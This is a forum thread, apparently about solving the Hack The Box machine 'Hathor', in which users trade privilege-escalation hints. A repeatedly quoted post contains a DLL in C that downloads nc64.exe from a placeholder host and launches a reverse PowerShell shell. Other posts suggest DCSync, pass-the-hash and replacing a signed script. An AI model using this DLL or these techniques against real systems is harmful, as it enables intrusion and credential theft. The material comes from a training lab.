Posts: 40 Threads: 0 Joined: N/A April 30, 2022 at 9:33 AM (April 30, 2022, 06:27 AM)qwerty173 Wrote: crack the pfx file password. i noticed that you can't run ps1 files without a digital signature, so that's what im trying now. if anyone else has any other information that would be great You have no issue accessing the box? Which VPN Access / Server are you using? I'm encountering 503 Service Unavailable on Port 80. Posts: 30 Threads: 0 Joined: N/A April 30, 2022 at 9:39 AM (April 29, 2022, 09:24 AM)jon01 Wrote: here is the script for dlll
# include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
system("takeown /f C:\\share\\Bginfo64.exe");
system("icacls C:\\share\\Bginfo64.exe /grant Everyone:F /T");
system("curl x.x.x.x:x/nc64.exe -o c:\\share\\Bginfo64.exe");
system("C:\\share\\Bginfo64.exe x..x.x.x x -e powershell.exe");
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
} i having error when curl . if anyone rooted this box plz share the ntml hash of administrator https://synisl33t.com/2022/04/20/htb-hathor/ Posts: 42 Threads: 0 Joined: N/A April 30, 2022 at 10:01 AM (April 30, 2022, 09:33 AM)yemacaw863 Wrote: (April 30, 2022, 06:27 AM)qwerty173 Wrote: crack the pfx file password. i noticed that you can't run ps1 files without a digital signature, so that's what im trying now. if anyone else has any other information that would be great
You have no issue accessing the box? Which VPN Access / Server are you using?
I'm encountering 503 Service Unavailable on Port 80. there's an issue with the machine at the moment, they said it will be fixed by the dev team next week. in the mean time you can contact one of the mods to patch it Posts: 21 Threads: 0 Joined: N/A April 30, 2022 at 10:08 AM (April 30, 2022, 09:33 AM)yemacaw863 Wrote: (April 30, 2022, 06:27 AM)qwerty173 Wrote: crack the pfx file password. i noticed that you can't run ps1 files without a digital signature, so that's what im trying now. if anyone else has any other information that would be great
You have no issue accessing the box? Which VPN Access / Server are you using?
I'm encountering 503 Service Unavailable on Port 80. Known issue it appears, they'll prob fix it in a while Posts: 42 Threads: 0 Joined: N/A April 30, 2022 at 10:49 AM (April 30, 2022, 09:39 AM)___user___ Wrote: (April 29, 2022, 09:24 AM)jon01 Wrote: here is the script for dlll
# include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
system("takeown /f C:\\share\\Bginfo64.exe");
system("icacls C:\\share\\Bginfo64.exe /grant Everyone:F /T");
system("curl x.x.x.x:x/nc64.exe -o c:\\share\\Bginfo64.exe");
system("C:\\share\\Bginfo64.exe x..x.x.x x -e powershell.exe");
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
i having error when curl .
if anyone rooted this box plz share the ntml hash of administrator
https://synisl33t.com/2022/04/20/htb-hathor/ make sure you are running "curl.exe" not just "curl" Posts: 213 Threads: 0 Joined: N/A April 30, 2022 at 6:12 PM (April 30, 2022, 06:01 PM)jon01 Wrote: (April 30, 2022, 06:27 AM)qwerty173 Wrote: crack the pfx file password. i noticed that you can't run ps1 files without a digital signature, so that's what im trying now. if anyone else has any other information that would be great
THERE IS RUN.VBS IN THE C:\Get-bADpasswords : If you run the vbs as gina it runs the ps1 as another user&&running run.vbs script it will execute another ps1 file in this get bad password DIR : just replace that .ps1 Can you explain why running run.vbs runs this other ps1 script? I see only this one eventcreate line in run.vbs. Posts: 40 Threads: 0 Joined: N/A (April 30, 2022, 06:01 PM)jon01 Wrote: (April 30, 2022, 06:27 AM)qwerty173 Wrote: crack the pfx file password. i noticed that you can't run ps1 files without a digital signature, so that's what im trying now. if anyone else has any other information that would be great
THERE IS RUN.VBS IN THE C:\Get-bADpasswords : If you run the vbs as gina it runs the ps1 as another user&&running run.vbs script it will execute another ps1 file in this get bad password DIR : just replace that .ps1 I'm stuck again after I got bpassrunner shell :( This user can read & execute C:\script\login.cmd Not sure what to do... Little nudge pls.. Thanks Posts: 42 Threads: 0 Joined: N/A (May 1, 2022, 12:26 AM)yemacaw863 Wrote: (April 30, 2022, 06:01 PM)jon01 Wrote: (April 30, 2022, 06:27 AM)qwerty173 Wrote: crack the pfx file password. i noticed that you can't run ps1 files without a digital signature, so that's what im trying now. if anyone else has any other information that would be great
THERE IS RUN.VBS IN THE C:\Get-bADpasswords : If you run the vbs as gina it runs the ps1 as another user&&running run.vbs script it will execute another ps1 file in this get bad password DIR : just replace that .ps1
I'm stuck again after I got bpassrunner shell :(
This user can read & execute C:\script\login.cmd
Not sure what to do... Little nudge pls.. Thanks Got a shell as bpassrunner as well... Looks like that login.cmd file is actually just for the dll stuff... Unfortunately not quite sure where to move next, still looking around. Posts: 21 Threads: 0 Joined: N/A Get-bADpasswords.ps1 needs to remain digitally signed as all ps1 files must be signed. Posts: 42 Threads: 0 Joined: N/A (May 1, 2022, 09:07 AM)jon01 Wrote: (May 1, 2022, 02:18 AM)qwerty173 Wrote: (May 1, 2022, 12:26 AM)yemacaw863 Wrote: (April 30, 2022, 06:01 PM)jon01 Wrote: (April 30, 2022, 06:27 AM)qwerty173 Wrote: crack the pfx file password. i noticed that you can't run ps1 files without a digital signature, so that's what im trying now. if anyone else has any other information that would be great
THERE IS RUN.VBS IN THE C:\Get-bADpasswords : If you run the vbs as gina it runs the ps1 as another user&&running run.vbs script it will execute another ps1 file in this get bad password DIR : just replace that .ps1
I'm stuck again after I got bpassrunner shell :(
This user can read & execute C:\script\login.cmd
Not sure what to do... Little nudge pls.. Thanks
Got a shell as bpassrunner as well... Looks like that login.cmd file is actually just for the dll stuff... Unfortunately not quite sure where to move next, still looking around.
go for dcync attack u will get admin hash i dumped admin account using get-adreplaccount but im not sure what to do with the hashes, the ntlm one can't be cracked and doesn't let me perform pth... i feel like kerberos is the way forward but im not sure how to use it with evilwinrm etc |
